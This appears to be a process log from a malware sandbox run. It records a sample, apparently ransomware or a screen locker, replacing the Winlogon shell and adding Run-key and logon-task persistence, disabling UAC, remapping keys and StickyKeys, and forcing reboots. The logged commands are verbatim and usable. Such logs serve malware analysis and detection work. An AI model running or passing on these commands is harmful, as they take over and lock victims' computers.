C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\system.exe
C:\Users\Admin\AppData\Local\system.exe
C:\Users\Admin\AppData\Local\system.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\windows\SysWOW64\cmd.exe
C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\shutdown.exe
shutdown -r -t 10 -f
C:\Windows\SysWOW64\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
C:\Windows\SysWOW64\shutdown.exe
shutdown -r -t 10 -f
Network
Files